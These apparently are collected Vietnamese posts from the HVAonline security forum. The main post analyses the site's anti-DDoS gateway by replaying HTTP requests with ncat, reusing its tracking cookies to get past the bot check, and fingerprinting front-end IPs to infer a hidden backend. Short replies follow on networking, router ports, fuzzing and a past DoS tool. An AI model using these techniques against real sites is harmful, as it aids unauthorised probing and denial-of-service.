GET /tof/ HTTP/1.1
Host: www.hvaonline.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: /
Cookie: __utms=123.19.0.4.1352775433230315

cat hva_pkt_step_4|ncat www.hvaonline.net 80
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2012 02:58:19 GMT
Server: Apache mod_jk/1.2.31
Last-Modified: Sun, 31 Jul 2011 23:18:57 GMT
ETag: "4126e3-696-4a965bd25ba40"
Accept-Ranges: bytes
Content-Length: 1686
Cache-Control: max-age=300
Expires: Tue, 13 Nov 2012 03:03:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Set-Cookie: __utmz=123.19.0.4.1352775499633686; path=/; max-age=900
Keep-Alive: timeout=4, max=1000
Connection: Keep-Alive

<script>

</script>

Chặng tiếp theo sắp bước vào cửa nhà nên bị đánh dấu thêm một lần nữa, vẫn 15 phút.
Set-Cookie: __utmz=123.19.0.4.1352775499633686; path=/; max-age=900

Lúc nãy __utms giờ là __utmz không biết cái đuôi sau có liên quan tới timestamp không nhỉ ?. Để đó đã giờ gở cái urlencode ra.

<html>
<head>
<script type="text/javascript">
function wwwectUser(){ window.location = "/hvaonline/forums/list.html"; }
</script>
<style type="text/css">
<!--
BODY {
background-color: #111111;
font-family : Verdana, Geneva, Arial, Helvetica;
font-size : small;
font-weight : bold;
text-align : center;
color: White;
font-size: 12px;
}

A {
color : White;
text-decoration : none;
font-size: 12px;
}

A:HOVER {
color : FFCC33;
text-decoration : none;
font-size: 12px;
}

A.Link {
color: FFCC33;
text-decoration: none;
font-size: 12px;

}
.style1 {font-size: 10px}
</style>
</head>
<body color="#111111" onload="setTimeout('wwwectUser()', 1000)">
<br>
<h1 class="style1">Going to....</h1>
</body>
</html>

Ổng cho ta vài giây để bước vào hoặc đi luôn, rất có thể ổng sẽ check độ trể ở đây, chẳng hạn bạn kết nối trực tiếp bạn mất 5 giây để bước vào, nhưng khi bạn đi qua proxies thì bạn mất nhiều hơn 5 giây. Vấn đề đặt ra bạn phải bước vào sau 1 giây và trước 5 (<- cái này em đoán).

Em thử lấy 2 cái cookie kia nhét vào packet thứ 5

GET /hvaonline/forums/list.html HTTP/1.1
Host: www.hvaonline.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: /tof/
Cookie: __utms=123.19.0.4.1352775433230315; __utmz=123.19.0.4.1352775499633686

Mặc dù tôi mất hơn 3 phút để làm việc đó nhưng ổng vẫn cho tôi vào. HVA đang trong tình trạng thời bình chăng ?.Tới đây chúng ta chính thức đặt chân vào home rồi.

<iframe src="/hvaonline/templates/ping_session.html" height="0" width="0" frameborder="0" scrolling="no"></iframe>

Đây là liêu thuốc ổng cho mình uống

<html>
<head>
<meta http-equiv="refresh" content="300">
</head>
pong
<body>
</body>
</html>

5 phút một lần, lúc hỏi thì anh già tiết lộ là để xem "còn sống" không.

Chúng ta chuyển hướng qua chổ khác www.hvaonline.net (74.63.219.14 khác 3 IP ở trên).Đây là nơi chứa dữ liệu tĩnh. Thử vào bằng trình duyệt thì thấy.

<html>
<head>
<title>Hello - Goodbye</title>
</head>
<body bgcolor="white" text="black">
<center><h1></h1></center>
</body>
</html>

Giống thông báo đầu khi chơi Counter Strike (Hello & Goobye =. smilie

.
Nếu tiếp tục bắt gói tin của các phiên làm việc tôi lại thấy lạ vì đôi lúc kết nối được tạo rồi lại đóng ngay sau đó. Nó không bị đóng bằng cách RST mà, được đóng rất lịch sự bằng FIN.

Ngồi tìm tòi thêm thôi thấy điều sau khi gửi cùng tcp packet tới các IP khác nhau.

76.72.167.122 76.72.167.122 Linux (2.6.X)
Last-Modified: Tue, 02 Aug 2011 04:28:57 GMT
49.212.135.219 www7445uf.sakura.ne.jp Cisco embedded
Last-Modified: Tue, 02 Aug 2011 04:28:57 GMT
78.46.136.116 hvaonline.net WatchGuard embedded
Last-Modified: Tue, 02 Aug 2011 04:28:57 GMT

Ta thấy Last-Modified trùng khớp, 3 server này chỉ là bao cát để chịu trận thôi, vẫn còn một hoặc nhiều hơn một server đứng đằng sau. Mọi cố gắng đi vào sâu hơn đều vô vọng, hay ít nhất với em là vô vọng.

Tới đây em tạm kết luận như sau:
- Khảo sát các tầng cần được bảo mật, mỗi tầng đưa ra một biện pháp riêng.
- Đảm bảo người dùng và BOT hợp lệ tiếp cận được thông tin, phân loại đối tượng truy cập dựa trên đặc điểm.
- Hạn chế các điểm tiếp xúc không cần thiết với internet.

superthin wrote:

Có cùng thắc mắc như conmale.

Có lẽ core2x, hachoa59 hoặc là đùa kiểu đá đểu người hỏi hoặc là chả hiểu biết quái quỉ gì về cách thức mạng hoạt động. Người hỏi cũng không rõ là nắm được các thông số về mạng của người dùng cách nào, nếu anh ta là người của ISP và là người cấu hình cái modem ADSL thì không bàn, chứ còn nếu là một người làm web và "mình chỉ biết IP đó dùng mạng VPN,online bằng trình duyệt nào và vào thời gian nào thôi" thì làm thế quái nào lấy được MAC của người dùng? Có lấy được làm sao chắc được nó là MAC cứng và không thay đổi?

=>

superthin wrote:

chả hiểu biết quái quỉ gì về cách thức mạng hoạt động.

Trích lại câu bồ nói ! áp dụng với bồ vẫn đúng, nói chuẩn.

Hồi trước có làm hợp đồng bên đó nên "điều tra" chút. Giám đốc bên đó anh Viên thì phải. Về chuyện hợp tác với nước ngoài thì có. Học viên cũng kha khá, thôi cậu cứ nhắm mắt đưa chân vậy smilie

.

Nói nhỏ là mấy thằng kỹ thuật bên đó hơi chuối smilie

nói chuyện một lần mình nhớ mãi (chưa nói thầy nhé).

songoku wrote:

Anh Conmale thính thế... nhưng em muốn đính chính 1 tí là Vịt teo không có lỡ mua đồ heo quay đâu anh... mà là cố tình mua. Còn vụ gỡ mìn thì không làm nỗi nên bây giờ siết chặt chính sách truy cập hệ thống lắm anh ma heo quay bây giờ cũng quay lưng với vịt tèo rồi chắc cài đủ mìn rồi và không kiếm được tiền nữa.

Lỡ mua cả thôi chứ Viettel "uy tín" lắm, mấy công ti nhà nước làm ăn thì "uy tín" thôi rồi luôn smilie

.

BlueMM wrote:

Em đang xài USB 3G của Huawei, mấy bác HVA thử phân tích xem nó có backdoor hay không, cần phải có nghiên cứu cụ thể để chứng minh mới được.

Em cũng đang thắc mau cái DSL Router của em mở cổng:
52869/tcp open unknown

Để làm cái gì đây, bác nào tiện thì tìm hiểu luôn về vụ TPLink, DLink... không "khuyến khích" người dùng asia overrider firmware. Mà hay là mấy cái sản phẩm cùng series ở US và EU đều cho phép overrider firmware. Em đang điên máu mà chư biết đổ vào đâu đây. Ai cho em cái router em nghịch xem nào.

xuanphongdocco wrote:

Kiểm tra firewall của bạn có cho telnet.exe gởi socket bằng port 25/110 không?

Telnet.exe gởi socket bằng port 25/110 là cái gì vậy trời ?.

Em còn ngu mấy cái nớ ! hôm bửa vòng qua mà thấy toàn boy kute nên lặn luôn smilie

.

1. Mình ko hiểu cụ thể cái sandbox của chiro8x là làm cái gì nhỉ?

-> Trong quá trình tìm hiểu mình được biết, sandbox được phát triển trên công nghệ oả hoá, tuy nhiên việc ảo hoá này không giống với virtual machine, nó tạo ra một vùng ảo trên máy thực để thực thi chương trình chưa được chứng thực. Có lẽ mình dùng từ sandbox ở đây là chưa sát. Như bạn thấy việc thực thi các script như PHP/ASP/JS thường thông qua một framework, mình chỉ cổ tạo ra một vùng đệm giữa framework đó và script, mục đích truyền tham số và nhận các tác động trở lại.

2. Theo mình hiểu sandbox thì nó chỉ cho phép các ứng dụng chạy trong đó không tác động ra ngoài.

-> Bạn sử dụng sandbox chủ yếu để sử dụng các ứng dụng (chưa được bạn hoặc một tổ chức uy tín nào đó chứng thực) mục đích là bạn muốn sử dụng các khả năng của ứng dụng đó. Vậy làm sao bạn có thể sử dụng khi không tương tác với nó (thông qua GUI, command line, file I/O stream ?).

3.Như vậy nó cần 1 ứng dụng nữa để đưa đầu vào và đầu ra cho ứng dụng đc test nữa đúng ko?
-> Đúng

4. Tập dữ liệu bất thường đó cũng là đc xây dựng cho từng ứng dụng khác nhau nó cũng sẽ khác nhau đúng ko?
-> Có những dữ liệu bất thường chung có thể dẫn tới trạng thái không ổn định của một chương trình, bạn đọc về bài viết tràn bộ đệm trong box RCE biết thêm, tớ không rành mãng đó.

Ex. Mình nhớ lúc trước (2002) có một chương trình NUKE chuyên tấn công một số loại modem dail-up, nó gửi NULL bytes và 0x41 (A) để thực hiện DoS, mãi sau này một số chương trình UDP Flood vẫn sử dụng dữ liệu đó.

5. Nghe như bạn mô tả thì có vẻ RIPS nó giống với cái mà bạn nói, nhưng mình ko thấy có gì là sandbox ở trong đó cả.
-> RIPS là sản phẩm cuối rối chứ RIPS không phải là tên mà công nghệ người ta sử dụng. Có lẽ mình sẽ tìm từ nào đó thích hợp hơn, hoặc bạn tìm hiểu về định nghĩa của sandbox xem nó có phù hợp không.

6. Thêm 1 câu nữa: bạn có mô hình nào cụ thể để mình hiểu về QA dựa theo sandbox này đc ko?
-> Tuỳ theo câu hỏi của bạn hay không, tuỳ theo khả năng của mình có thể trả lời nỗi nó không. Nhưng bạn luôn được chào đón.

Chẹp ! em vào thì thấy có cái list IP thế, em lấy mấy cái IP thảy lên http://geoiptool.com
Em thấy mấy cái cờ lạ lạ không phải ở Việt Nam.

Mấy bạn chỉ phục vụ cho nhu cầu ở Việt Nam chắc cũng không muốn phục vụ mấy bạn cờ lạ này đâu. Vậy sao mấy bạn không tạm thời chặn request do mấy cái "cờ" lạ này nhỉ ?. Hôm bửa em lên thấy bạn xin list IP của Việt Nam rồi đấy. Anh conmale cũng cho rồi.

Lập trình windows mà không biết MSDN coi như mù một mắt.

Đọc về GetFileAttributes ở đây:
http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944%28v=vs.85%29.aspx

Nhớ đọc thêm phần File Attribute Constants.